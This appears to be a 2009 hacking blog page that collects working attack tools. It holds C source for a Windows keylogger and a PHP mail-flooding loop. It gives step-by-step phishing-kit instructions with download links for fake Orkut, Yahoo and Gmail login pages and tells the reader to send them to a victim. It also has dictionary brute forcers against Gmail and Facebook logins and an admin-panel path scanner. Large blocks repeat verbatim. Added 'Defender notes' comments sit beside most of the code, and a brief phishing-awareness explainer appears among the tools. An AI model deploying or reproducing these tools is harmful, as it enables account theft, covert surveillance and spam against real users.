Friday, July 10, 2009
Key logger
#include
#include
#include
#include
#define VK_PERIOD '.'
#define FILENAME "log.txt"
HWND OldForegroundWindow;
HWND CurrentForegroundWindow;
HHOOK Hook;
char WindowName[256];
LRESULT CALLBACK KeyboardHook(int Code,WPARAM wParam, LPARAM lParam);
void CheckKey(int key);
/*
 * Entry point of the keylogger sample.
 *
 * Appends a "Logging started at" banner with the local time to FILENAME
 * (a relative path, so the file lands in the process's working directory),
 * registers KeyboardHook as a WH_KEYBOARD_LL hook, and then sits in a
 * message loop for as long as GetMessage returns non-zero. The return value
 * is the result of UnhookWindowsHookEx.
 *
 * Defender notes: the program creates no window; a process that installs a
 * WH_KEYBOARD_LL hook and then only pumps messages is the behaviour that
 * API-level telemetry can flag. The banner text written below is a fixed
 * string that also appears verbatim in the log file it produces.
 */
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
time_t rawtime;
struct tm* time_info;
time(&rawtime);
time_info = localtime(&rawtime);
/* Write the start-of-session banner, then close the file again. */
FILE *Log = fopen(FILENAME,"a+");
fprintf(Log,"\n\n Logging started at: %s \n\n",asctime(time_info));
fclose(Log);
/* Thread id 0: the hook is not bound to a single thread of this process. */
Hook = SetWindowsHookEx(WH_KEYBOARD_LL,KeyboardHook,hInstance,0);
/* Empty-bodied loop: the message pump is the only work done on this thread. */
while(GetMessage(0,0,0,0));
return UnhookWindowsHookEx(Hook);
}
/*
 * Keyboard hook callback registered by WinMain.
 *
 * Acts only when Code is HC_ACTION and wParam is WM_KEYDOWN. When the
 * foreground window differs from the one remembered in
 * OldForegroundWindow, its title (read into the 256-byte WindowName
 * buffer) is appended to FILENAME between "[ " and " ]". The virtual-key
 * code from the KBDLLHOOKSTRUCT is then handed to CheckKey and
 * CallNextHookEx is called.
 *
 * Defender notes: the log therefore pairs window titles with the keys typed
 * into them; the "[ title ]" separators give the file a recognisable layout
 * during triage of a suspected host.
 */
LRESULT CALLBACK KeyboardHook(int Code,WPARAM wParam, LPARAM lParam)
{
if( Code == HC_ACTION && wParam == WM_KEYDOWN )
{
/* Foreground window changed since the last logged key press. */
if(OldForegroundWindow != (CurrentForegroundWindow = GetForegroundWindow()) )
{
FILE *File = fopen(FILENAME,"a+");
ZeroMemory(WindowName,256);
GetWindowText(CurrentForegroundWindow,WindowName,256);
fprintf(File,"\n\n [ %s ] \n\n",&WindowName);
fclose(File);
OldForegroundWindow = CurrentForegroundWindow;
CurrentForegroundWindow = NULL;
}
CheckKey(((PKBDLLHOOKSTRUCT)lParam)->vkCode);
return CallNextHookEx(Hook,Code,lParam,wParam);
}
}
/*
 * Appends a text form of one virtual-key code to FILENAME.
 *
 * Tab and Return are written as the tokens "[TAB]" and "[ENTER]", space and
 * VK_PERIOD as the characters themselves. Codes 48..90 are written as a
 * character: unchanged when GetKeyState(VK_CAPITAL) is non-zero, with 32
 * added otherwise. Any other key code produces no output.
 *
 * Defender notes: the file is opened, appended to and closed once per call,
 * i.e. once per logged key press, which shows up as a steady stream of tiny
 * appends to a single file in file-system telemetry.
 */
void CheckKey(int Key)
{
FILE *Log = fopen(FILENAME,"a+");
switch( Key )
{
case VK_TAB:
fprintf(Log,"[TAB]",0);
break;
case VK_RETURN:
fprintf(Log,"[ENTER]",0);
break;
case VK_SPACE:
fprintf(Log," ",0);
break;
case VK_PERIOD:
fprintf(Log,".",0);
break;
default:
/* 48..90 is the range of codes this sample writes as a single character. */
if(Key >= 48 && Key <= 90)fprintf(Log,"%c",GetKeyState(VK_CAPITAL)?Key:(Key+32));
};
fclose(Log);
}
#include
#include
#include
#define VK_PERIOD '.'
#define FILENAME "log.txt"
HWND OldForegroundWindow;
HWND CurrentForegroundWindow;
HHOOK Hook;
char WindowName[256];
LRESULT CALLBACK KeyboardHook(int Code,WPARAM wParam, LPARAM lParam);
void CheckKey(int key);
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
time_t rawtime;
struct tm* time_info;
time(&rawtime);
time_info = localtime(&rawtime);
FILE *Log = fopen(FILENAME,"a+");
fprintf(Log,"\n\n Logging started at: %s \n\n",asctime(time_info));
fclose(Log);
Hook = SetWindowsHookEx(WH_KEYBOARD_LL,KeyboardHook,hInstance,0);
while(GetMessage(0,0,0,0));
return UnhookWindowsHookEx(Hook);
}
LRESULT CALLBACK KeyboardHook(int Code,WPARAM wParam, LPARAM lParam)
{
if( Code == HC_ACTION && wParam == WM_KEYDOWN )
{
if(OldForegroundWindow != (CurrentForegroundWindow = GetForegroundWindow()) )
{
FILE *File = fopen(FILENAME,"a+");
ZeroMemory(WindowName,256);
GetWindowText(CurrentForegroundWindow,WindowName,256);
fprintf(File,"\n\n [ %s ] \n\n",&WindowName);
fclose(File);
OldForegroundWindow = CurrentForegroundWindow;
CurrentForegroundWindow = NULL;
}
CheckKey(((PKBDLLHOOKSTRUCT)lParam)->vkCode);
return CallNextHookEx(Hook,Code,lParam,wParam);
}
}
void CheckKey(int Key)
{
FILE *Log = fopen(FILENAME,"a+");
switch( Key )
{
case VK_TAB:
fprintf(Log,"[TAB]",0);
break;
case VK_RETURN:
fprintf(Log,"[ENTER]",0);
break;
case VK_SPACE:
fprintf(Log," ",0);
break;
case VK_PERIOD:
fprintf(Log,".",0);
break;
default:
if(Key >= 48 && Key <= 90)fprintf(Log,"%c",GetKeyState(VK_CAPITAL)?Key:(Key+32));
};
fclose(Log);
}
Bomber Mail
// Fragment of a mail-flooding script. The code that sets $mode, $banyak,
// $inp, $subjec and $messages is not shown on the page.
// When $mode is non-empty, the loop below calls mail() $banyak times with the
// same recipient, subject, body and headers.
// Defender notes: on a hosting platform this appears as a burst of identical
// outbound messages from one account; per-account sending limits on the mail
// server are the control aimed at this pattern.
if($mode==""){
}else{
for($i=1;$i<=$banyak;$i++){
$headers = "From: $inp[name_from]<$inp[mail_from]>\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=\"iso-8859-1\"\r\n";
$subject = "$subjec";
$to = "$inp[mail_to]";
mail($to, $subject, $messages, $headers);
}
}
?>
PHISHING - YOU MIGHT BE THE NEXT VICTIM..
Everybody must have come across the term "phishing", haven't they? But do you know what cyber experts call it, how a user is cheated with phishing, or what techniques are used? For these and many more questions like them, here is an excellent piece of information about phishing.
WHAT IS PHISHING??
Phishing means fraudulently acquiring a user's personal information.
Phishing is usually performed by obtaining the personal information of a user who uses online banking and then misusing it.
HOW IT IS CARRIED OUT??
In a classical phishing attack, the phisher sends the user a spam email that claims to come from a trusted organization and asks the user to verify his/her account. The email also contains statements like ‘legal actions threatened’ or ‘closure of account may occur’.
Such emails also usually contain links that the user is asked to click. When the user clicks the link and submits the requested details, the sensitive information is provided to the phisher. The personal information is then used by the phisher for any bad deeds.
Here are a few phrases a phisher uses
“verify your account”
Businesses should not ask you to send passwords, login names, Social Security numbers, or other personal information through e-mail
"If you don't respond within 48 hours, your account will be closed".These messages convey a sense of urgency so that you'll respond immediately without thinking. Phishing e-mail might even claim that your response is required because your account might have been compromised.
“Click on the below link to access your account”
These sorts of links are usually masked links: they might have names similar to the organization's real link, but they point to a wrong destination.
The masking can be seen when you bring the cursor near the link.
A phisher may also use deceptive look-alike URLs. In the list below, the first address is the genuine one, and URLs such as those that follow it are used instead:
http://www.microsoft.com/
http://www.micosoft.com/
http://www.mircosoft.com/
http://www.verify-microsoft.com/
HOW PHISHING MAY AFFECT YOU ?? (To Be Continued..)
WHAT IS PHISHING??
Phishing means fraudulently acquiring personal information of a user
Phishing is usually performed by getting the personal information of a user using online banking and then making wrong use of it
HOW IT IS CARRIED OUT??
In a classical Phishing attack the Phisher sends the user a spam email naming it to be from the trusted organization to verify his\her account The email also contains statements like ‘legal actions threatened’ or ‘closure of account may occur’
Such emails also usually contain links which need to be clicked When the user clicks on the link the sensitive information is provided to the phisher The personal Information is then used by the phisher for any bad deeds
Here are a few phrases a phisher uses
“verify your account”
Businesses should not ask you to send passwords, login names, Social Security numbers, or other personal information through e-mail
"If you don't respond within 48 hours, your account will be closed".These messages convey a sense of urgency so that you'll respond immediately without thinking. Phishing e-mail might even claim that your response is required because your account might have been compromised.
“Click on the below link to access your account”
these sort of links are usually masked links they might have names similar to the link of the organization but they point to a wrong destination
the masking can be seen when u bring the cursor near the link
A phisher may also use con artisted URLs such as the following are used instead of
http://www.microsoft.com/
http://www.micosoft.com/
http://www.mircosoft.com/
http://www.verify-microsoft.com/
HOW PHISHING MAY AFFECT YOU ?? (To Be Continued..)
Phising....(HOW HACKER TAKES AWAY SOMEONE'S PASSWORD)
PHISHING 100% Working plzzzzz Dont MiSSSSsuse
guys heres the fake page of orkut,yahoo or request any other.
I WILL TRY TO COMPLETE
ORKUT PHISHING
DOWNLOAD THIS FILES
http://rapidshare.com/files/163459603/orkut.rar
AND UPLOAD ALL FILES TO WEBHOST
YAHOO
NEW YAHOO LOGIN PHISHER
LATEST YAHOO PHISHER
http://rapidshare.com/files/165982792/indian_yahoo_phisher.rar
it will update automatically
Upload all files in webhost
.html is ur phisher page and .txt is link for password
1. extract the files
2.create new account in any webhost
3.go to control panel then file manager and upload all files there
4. there is one .html(phishing page) and and one .txt(all passwords) file
5.give the .html file to victim by telling him some blah blah story
6.that's it
WEBHOSTS
http://www.100webspace.com
http://www.clawz.com
http://www.webhostme.com
http://www.siteburg.com
http://mywebhut.com
http://www.wagoo.com
http://1asphost.com
http://www.aushost.org.uk
http://www.freehosting.hostrave.com
gmail kaise bhool gaye..
here is...
http://rapidshare.com/files/167907208/mostworking_fake_pages__gmail.rar.html
Lol!! Just Go to the Login page.Right click your mouse and choose the view source page. Copy paste the entire text into a text file. Now go to the text file and the extension from .txt to .htm. Your fake page is ready for usage.
Incase you know php there is no need I should tell you further. For noobs first upload php file on to a hosting php supported website. Now go and Search for the suitable string in the login page whose clone is to be made where it says method/form action=" DB Address".Like in case of orkut
Now replace https://www.google.com/accounts/ServiceLoginAuth?service=orkut with the php file address that you have uploaded on a hosting site.Now upload the fake page also you made on to your hosting site and fetch the URL to the victim. Incase you are lucky and the victim logins you will get the password in a text file(you need to upload an additional text file also to get passwords(only for beginners not for advanced users of php) and in php file,code should be written such that it would redirect the ID and pass to this text file)
P.S:-For the complete set of phishing files of orkut download the file from the link below
http://www.freeuploading.com/files/6g010IE/orkut_rar.php
here is the sample....
Orkut Hacking 100% Working Dont Misuse
guys heres d fake page of orkut der are in total 4 files dat u simply need to upload on php supported webhost i suggest ripway
http://rapidshare.com/files/158948786/OFPFP.rar
extract the files den upload
u need not edit anything in dz
once u will upload the files u will see three files and der wud b a file
http://h1.ripway.com/xxxxxxxxxxx/confirm.html
where xxxxxxxxxxx is ur user name,u need to send this link to the victim making any story blah blah or wotever u make
once d victim enters d details in the page and d moment he will press enter u will get the username and password wotever he has typed in inside ur php supported webhost account in the fourth file dat wud be login.txt and now visible
after uploading the files you can try by typing anything in the user name and password
to view username and password click on the edit link of the login.txt file and initially this file wud be invisible u can make it visible by typing any details in the fake page urself
dont use this trick to hack unknown people,i know still many people wud do but think how u gonna feel wen ur account wud be hacked by sum1 else yup u can enjoy by hacking ur friends account still i know u will work according to ur wish
enjoy
guys heres the fake page of orkut,yahoo or request any other.
I WILL TRY TO COMPLETE
ORKUT PHISHING
DOWNLOAD THIS FILES
http://rapidshare.com/files/163459603/orkut.rar
AND UPLOAD ALL FILES TO WEBHOST
YAHOO
NEW YAHOO LOGIN PHISHER
LATEST YAHOO PHISHER
http://rapidshare.com/files/165982792/indian_yahoo_phisher.rar
it will update automatically
Upload all files in webhost
.html is ur phisher page and .txt is link for password
1. extract the files
2.create new account in any webhost
3.go to control panel then file manager and upload all files there
4. there is one .html(phishing page) and and one .txt(all passwords) file
5.give the .html file to victim by telling him some blah blah story
6.that's it
WEBHOSTS
http://www.100webspace.com
http://www.clawz.com
http://www.webhostme.com
http://www.siteburg.com
http://mywebhut.com
http://www.wagoo.com
http://1asphost.com
http://www.aushost.org.uk
http://www.freehosting.hostrave.com
gmail kaise bhool gaye..
here is...
http://rapidshare.com/files/167907208/mostworking_fake_pages__gmail.rar.html
Lol!! Just Go to the Login page.Right click your mouse and choose the view source page. Copy paste the entire text into a text file. Now go to the text file and the extension from .txt to .htm. Your fake page is ready for usage.
Incase you know php there is no need I should tell you further. For noobs first upload php file on to a hosting php supported website. Now go and Search for the suitable string in the login page whose clone is to be made where it says method/form action=" DB Address".Like in case of orkut
Now replace https://www.google.com/accounts/ServiceLoginAuth?service=orkut with the php file address that you have uploaded on a hosting site.Now upload the fake page also you made on to your hosting site and fetch the URL to the victim. Incase you are lucky and the victim logins you will get the password in a text file(you need to upload an additional text file also to get passwords(only for beginners not for advanced users of php) and in php file,code should be written such that it would redirect the ID and pass to this text file)
P.S:-For the complete set of phishing files of orkut download the file from the link below
http://www.freeuploading.com/files/6g010IE/orkut_rar.php
here is the sample....
Orkut Hacking 100% Working Dont Misuse
guys heres d fake page of orkut der are in total 4 files dat u simply need to upload on php supported webhost i suggest ripway
http://rapidshare.com/files/158948786/OFPFP.rar
extract the files den upload
u need not edit anything in dz
once u will upload the files u will see three files and der wud b a file
http://h1.ripway.com/xxxxxxxxxxx/confirm.html
where xxxxxxxxxxx is ur user name,u need to send this link to the victim making any story blah blah or wotever u make
once d victim enters d details in the page and d moment he will press enter u will get the username and password wotever he has typed in inside ur php supported webhost account in the fourth file dat wud be login.txt and now visible
after uploading the files you can try by typing anything in the user name and password
to view username and password click on the edit link of the login.txt file and initially this file wud be invisible u can make it visible by typing any details in the fake page urself
dont use this trick to hack unknown people,i know still many people wud do but think how u gonna feel wen ur account wud be hacked by sum1 else yup u can enjoy by hacking ur friends account still i know u will work according to ur wish
enjoy
LARIKA Gmail Brute Forcer
// LARIKA Gmail Brute Forcer
// Top-level driver: fetches the Atom feed URL once without credentials and
// keeps the body in $wrong as the reference "not logged in" response, then
// passes each line of the dictionary file to check_correct() and stops at
// the first line for which it returns true.
// Defender notes: seen from the service, this is one account receiving a
// sequence of HTTP Basic authentication attempts; per-account attempt
// limits, lockout and a second authentication factor are the controls that
// apply to it.
$dict = ""; // Your dictionary file here
$username = ""; // Your username here
$proxy = ""; // Your proxy here
$port = ""; // Your proxy port here
$headers = array(
"Host: mail.google.com",
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
"Accept-Language: en-us,en;q=0.5",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_PROXY, $proxy);
curl_setopt($c, CURLOPT_PROXYPORT, $port);
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
// Peer certificate verification is switched off for this request.
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$wrong = curl_exec($c); // Get it
curl_close($c); // Close the curl stream
foreach(file($dict) as $line)
{
// Strip the CRLF line ending before using the line as a candidate.
$word = str_replace("\r\n", "", $line);
if(check_correct($username, $word, $wrong)) {
die("Found the password : ".$word."");
}
}
// Function for checking whether the username and password are correct
// Sends one request to the Atom feed URL with an "Authorization: Basic"
// header built from $username and $password, prints the response body, and
// returns true when that body differs from $wrong (the reference response
// captured by the caller), false when it is identical.
// Defender notes: every call carries the same fixed User-Agent string and a
// Basic-auth header for the same account, so the traffic is uniform apart
// from the credential being tried.
function check_correct($username, $password, $wrong)
{
$headers1 = array(
"Host: gmail.google.com",
"Authorization: Basic ".base64_encode($username.':'.$password),
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
"Accept-Language: en-gb,en;q=0.5",
"Accept-Encoding: text",
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://gmail.google.com/gmail/feed/atom');
curl_setopt($c, CURLOPT_PROXY, $proxy);
curl_setopt($c, CURLOPT_PROXYPORT, $port);
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
curl_setopt($c, CURLOPT_COOKIESESSION, true);
curl_setopt($c, CURLOPT_HTTPHEADER, $headers1);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1);
// Peer certificate verification is switched off for this request.
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
$str = curl_exec($c);
curl_close($c);
print $str; // for debug
if($str != $wrong) {return true;}
else {return false;}
}
?>
Face Book Brute Forcer
################################
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="brute@force.org"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list
// kontrol ("check"): submits one login form for the given e-mail
// ($kullaniciadi, "username") and password ($sifre, "password").
// POSTs the pair to the login URL, follows redirects, keeps cookies in
// cookie.txt, and returns true when the response body contains "Home"
// (case-insensitive match via eregi), false otherwise.
// Defender notes: each attempt is a POST to the login endpoint with the same
// constant User-Agent string and the same account name; per-account attempt
// limits and a second authentication factor are the controls that apply.
function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
// Peer certificate verification is switched off for this request.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home",$source)){return true;} else {return false;}
}
// Driver: exits if $dictionary is not a file, otherwise reads it, waits ten
// seconds, and calls kontrol() once per line with line endings removed.
// On the first true result it prints the pair, truncates cookie.txt and
// exits; every other line is reported as not found.
// Defender notes: the attempts are made strictly one after another against
// a single account, which is the pattern per-account throttling counts.
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..
";
sleep(10);
echo "Attack Started, brute forcing..
";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "[+] username:$username , password:$line - P
assword found : $line
";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "[-] username:$username , password:$line - Password not found :
$line
";}
}
?>
# Face Book Brute Forcer
################################
set_time_limit(0);
$username ="brute@force.org"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list
function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..
";
sleep(10);
echo "Attack Started, brute forcing..
";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "[+] username:$username , password:$line - P
assword found : $line
";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "[-] username:$username , password:$line - Password not found :
$line
";}
}
?>
Admin Finder
set_time_limit(0);
if (isset($_POST["submit_lol"])) {
$url = $_POST['hash_lol'];
echo "
Testing ".$url."
";
$adminlocales = array("admin1.php", "admin1.html", "admin2.php", "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "ccms/", "ccms/login.php", "ccms/index.php", "maintenance/", "webmaster/", "adm/", "configuration/", "configure/", "websvn/", "admin/", "admin/account.php", "admin/account.html". "admin/index.php", "admin/index.html", "admin/login.php". "admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.php", "admin.html", "admin/cp.php", "admin/cp.html", "cp.php", "cp.html", "administrator/", "administrator/index.html", "administrator/index.php", "administrator/login.html", "administrator/login.php", "administrator/account.html", "administrator/account.php", "administrator.php", "administrator.html", "login.php", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html", "moderator/admin.php", "moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php", "adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/index.asp", "admin/login.asp", "admin/home.asp", "admin/controlpanel.asp", "admin.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp", "administrator/login.asp", "administrator/account.asp", "administrator.asp", "login.asp", "modelsearch/login.asp", "moderator.asp", "moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html", "administration/", "administration.php", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php", "ur-admin.html", "ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", 
"administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php", "webadmin.asp", "webadmin.html", "administratie/", "admins/", "admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/", "admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/", "panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "autologin/", "support_login/", "meta_login/", "manuallogin/", "simpleLogin/", "loginflat/", "utility_login/", "showlogin/", "memlogin/", "members/", "login-redirect/", "sub-login/", "wp-login/", "login1/", "dir-login/", "login_db/", "xlogin/", "smblogin/", "customer_login/", "UserLogin/", "login-us/", "acct_login/", "admin_area/", "bigadmin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/", "hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/", "banneradmin/", "sshadmin/", "phpldapadmin/", "macadmin/", "administratoraccounts/", "admin4_account/", "admin4_colon/", "radmind-1/", "Super-Admin/", "AdminTools/", "cmsadmin/", "SysAdmin2/", "globes_admin/", "cadmins/", "phpSQLiteAdmin/", "navSiteAdmin/", "server_admin_small/", "logo_sysadmin/", "server/", "database_administration/", "power_user/", "system_administration/", "ss_vms_admin_sm/");
// Requests every candidate path in $adminlocales under the submitted $url
// and reports a path as found when the first response header line contains
// "200" (case-insensitive eregi match), otherwise as not found.
// Defender notes: in the target's access log this is a rapid series of
// requests from one client for a long list of administrative paths, most of
// them answered with an error status. Access to an administrative interface
// is better protected by authentication and network restrictions than by an
// unusual path.
foreach ($adminlocales as $admin){
$headers = get_headers("$url$admin");
if (eregi('200', $headers[0])) {
echo "$url$admin Found!
";
}
else {
echo "$url$admin NOT Found!
";
}
}
}
?>
Gmail Brute Forcer
#!usr/bin/python
#Gmail Brute Forcer
#To use this script you need ClientCookie and Client Form.
#http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
#http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
#To install the package, run the following command:
#python setup.py build
#then (with appropriate permissions)
#python setup.py install
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket, httplib, re
try:
sys.path.append('ClientCookie-1.0.3')
import ClientCookie
sys.path.append('ClientForm-0.1.17')
import ClientForm
except(ImportError):
print "\nTo use this script you need ClientCookie and Client Form."
print "Read the top intro for instructions.\n"
sys.exit(1)
from copy import copy
if len(sys.argv) !=3:
print "Usage: ./gmailbrute.py "
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com GmailBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server: https://www.gmail.com/"
print "[+] User:",sys.argv[1]
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
# Appends every entry of the saved copy `wordlist` back onto the global
# `words` list.
def reloader():
for word in wordlist:
words.append(word)
# Returns one randomly chosen entry from the global `words` list.
# While the list is non-empty, the chosen entry is removed from it. Once it
# is empty, reloader() refills it from `wordlist` and an entry is chosen
# without being removed. A threading.Lock is created, acquired and released
# inside each call.
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
# Thread that makes one login attempt with a word taken from getword().
# run() loads https://www.gmail.com/, fills the "Email" and "Passwd" fields
# of the first form on the page, submits it, and treats a response line
# matching "Gmail - Inbox" as a successful login, storing the word in the
# global `success`. socket.gaierror is caught and ignored.
# Defender notes: every attempt sends the same User-agent header and targets
# one account, so per-account attempt limits and a second authentication
# factor are the controls that apply to it.
class Worker(threading.Thread):
def run(self):
global success
value = getword()
try:
print "-"*12
print "User:",sys.argv[1],"Password:",value
# Fresh cookie jar and opener for this attempt.
cookieJar = ClientCookie.CookieJar()
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
opener.addheaders = [("User-agent","Mozilla/5.0 (compatible)")]
ClientCookie.install_opener(opener)
fp = ClientCookie.urlopen("https://www.gmail.com/")
forms = ClientForm.ParseResponse(fp)
form = forms[0]
form["Email"] = sys.argv[1]
form["Passwd"] = value
fp = ClientCookie.urlopen(form.click())
site = fp.readlines()
for line in site:
if re.search("Gmail - Inbox", line):
print "\tSuccessful Login:", value
success = value
sys.exit(1)
fp.close()
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
time.sleep(3)
try:
if success:
print "\n\n[+] Successful Login: https://www.gmail.com/"
print "[+] User:",sys.argv[1]," Password:",success
except(NameError):
print "\n[+] Couldn't find correct password"
pass
print "\n[+] Done\n"
#Gmail Brute Forcer
#To use this script you need ClientCookie and Client Form.
#http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
#http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
#To install the package, run the following command:
#python setup.py build
#then (with appropriate permissions)
#python setup.py install
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket, httplib, re
try:
sys.path.append('ClientCookie-1.0.3')
import ClientCookie
sys.path.append('ClientForm-0.1.17')
import ClientForm
except(ImportError):
print "\nTo use this script you need ClientCookie and Client Form."
print "Read the top intro for instructions.\n"
sys.exit(1)
from copy import copy
if len(sys.argv) !=3:
print "Usage: ./gmailbrute.py
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com GmailBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server: https://www.gmail.com/"
print "[+] User:",sys.argv[1]
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
